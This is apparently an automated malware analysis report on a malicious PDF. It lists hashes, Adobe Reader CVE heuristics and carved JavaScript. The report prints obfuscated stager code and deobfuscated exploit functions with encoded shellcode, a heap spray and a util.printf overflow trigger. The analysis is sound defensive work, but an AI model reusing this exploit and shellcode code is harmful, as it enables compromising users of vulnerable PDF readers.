Malicious PDF — malware analysis report

Static analysis result for SHA-256 10b3a5c7c2c75fdc…

MALICIOUS

PDF

118.6 KB
MD5: f4787ec213135e8e4ded4446fbce2ced SHA-1: 2135756f2824dff58171d6cb7aaf6c6edd53f075 SHA-256: 10b3a5c7c2c75fdc50532db77a1d25973b771f40d8c82458786ca473c0a8aa90
616 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains heavily obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the PDF_JS_EXPLOIT_CLUSTER and PDF_ADOBE_READER_MULTI_CVE_JS_KIT heuristics. The ClamAV detection of 'Pdf.Exploit.Agent-36086' further confirms its malicious nature.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
f27dfcb7b967db55363db759bb9ddb0185e2f3245f6a492440d93c8c02f5ddd0		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 626698 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cOk(gQF){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
c055afd82b33e68f59454483ed7c9fd8374e09f5ba3da4bb813d154fc3f25546		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u2EFF%u86ED%u4A10%uB64C%u2E10%u0DED%u2250%uF666%u830C%uF666%uAF18%u8629%uD1E7%u0D12%u95FC%u86A5%u2E10%u8687%uA078%u88A3%u46FC%u7875%u209A%u6985%uCEDE%uEE8D%uE423%uDD67%u1678%u2ACF%u46F7%uCF07%uC69A%u5D85%u0D9A%uEE04%u624B%u5BF7%uC278%u857A%uC61C%u87F2%u2E10%u8264%uAD3B%u8206%uEE1B%u7798%u4078%uF288%u4610%uEF9A%u477E%u79B9%u0645%uDFB4%uEE1B%u02E2%u2EE8%u86ED%uDE9B%uDE56%u2E10%uECED%u4610%uC2C4%u79F8%uCF85%u21FD%uEE93%u659B%uD90E%uCEF8%u86ED%uA710%uADE9%uC593%u8DE9%u5BD0%u0B1C%u2E95%u86EF%u7E10%u7985%u2E10%u79ED%u1A45%u0360%u2A10%u86ED%u4440%uECED%uA310%u8668%u2E12%uD6ED%u7BEF%u0BD5%u2EA5%u86E9%u8210%u46E7%uD565%u41A3%u0016%uFE88%uE975%u82AB%u2E10%u86ED%uAB9D%u82ED%u2E10%u4FDE%u7E41%uD312%u6E2C%u02E2%u2E90%u86ED%uA758%uCAA8%u2E78%u86AD%u4410%u79AD%u6645%u46E6%u4064%uC364%u4470%uECED%u4410%uECED%u4410%u79ED%u7E45%u46E6%u7464%u8687%u2E78%u86ED%u4414%uECED%uC710%u8647%u2E10%u79BD%u7A45%u46E6%u6C64%uC364%uA378%uE2A8%u4640%uC6ED%u2E10%uF312%uD170%uEE98%u7BEF%u8DB5%u5AD0%u0DF8%u4A55%u46E6%u2064%uF312%uD174%uE698%u5BEF%u79A1%u6E45%u5306%u5BEF%u79A1%u6A45%u4FC6%u7F51%u0360%u2A10%u86ED%uD140%uAAB8%uD17A%uD312%u7B20%u6A66%u539B%u8DE5%u5AEF%uD5A6%uF09B%u0DBB%u1263%uF266%u5623%u75EE%uA546%uA69B%uDD13%u4FDE%u6F59%u8540%u78D3%u70DE%u901F%uBEFD%u5AC6%u47E5%u23DE%u74EE%uC550%uBD1C%u70EE%u6398%uA54A%u0D06%u0A4A%u5BEE%uA576%uCDE1%u749B%u85F1%uA5CD%u0DE9%uEB13%uDDB3%u2CFB%u46DE%uEC4D%u86E9%u7FF8%u7912%u46EF%uF299%u1460%uA9C2%u5D71%uE784%u5E7E%uF482%u5A7E%uEF9F%u0060%uE98E%u017D%uF499%u4A71%uA988%u4D2F%uB7D0%u5D36%uE284%u1E2D%uE2DE%u1976%uE089%u1B25%uE3DC%u1F22%uBFDF%u4824%uB5DC%u1A28%uE4DD%u1C74%uB6D5%u1F27%uE3D5%u0828%uBB9E%u2E23%u86ED%u0010");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u2EFF%u86ED%u4A10%uB64C%u2E10%u0DED%u2250%uF666%u830C%uF666%uAF18%u8629%uD1E7%u0D12%u95FC%u86A5%u2E10%u8687%uA078%u88A3%u46FC%u7875%u209A%u6985%uCEDE%uEE8D%uE423%uDD67%u1678%u2ACF%u46F7%uCF07%uC69A%u5D85%u0D9A%uEE04%u624B%u5BF7%uC278%u857A%uC61C%u87F2%u2E10%u8264%uAD3B%u8206%uEE1B%u7798%u4078%uF288%u4610%uEF9A%u477E%u79B9%u0645%uDFB4%uEE1B%u02E2%u2EE8%u86ED%uDE9B%uDE56%u2E10%uECED%u4610%uC2C4%u79F8%uCF85%u21FD%uEE93%u659B%uD90E%uCEF8%u86ED%uA710%uADE9%uC593%u8DE9%u5BD0%u0B1C%u2E95%u86EF%u7E10%u7985%u2E10%u79ED%u1A45%u0360%u2A10%u86ED%u4440%uECED%uA310%u8668%u2E12%uD6ED%u7BEF%u0BD5%u2EA5%u86E9%u8210%u46E7%uD565%u41A3%u0016%uFE88%uE975%u82AB%u2E10%u86ED%uAB9D%u82ED%u2E10%u4FDE%u7E41%uD312%u6E2C%u02E2%u2E90%u86ED%uA758%uCAA8%u2E78%u86AD%u4410%u79AD%u6645%u46E6%u4064%uC364%u4470%uECED%u4410%uECED%u4410%u79ED%u7E45%u46E6%u7464%u8687%u2E78%u86ED%u4414%uECED%uC710%u8647%u2E10%u79BD%u7A45%u46E6%u6C64%uC364%uA378%uE2A8%u4640%uC6ED%u2E10%uF312%uD170%uEE98%u7BEF%u8DB5%u5AD0%u0DF8%u4A55%u46E6%u2064%uF312%uD174%uE698%u5BEF%u79A1%u6E45%u5306%u5BEF%u79A1%u6A45%u4FC6%u7F51%u0360%u2A10%u86ED%uD140%uAAB8%uD17A%uD312%u7B20%u6A66%u539B%u8DE5%u5AEF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.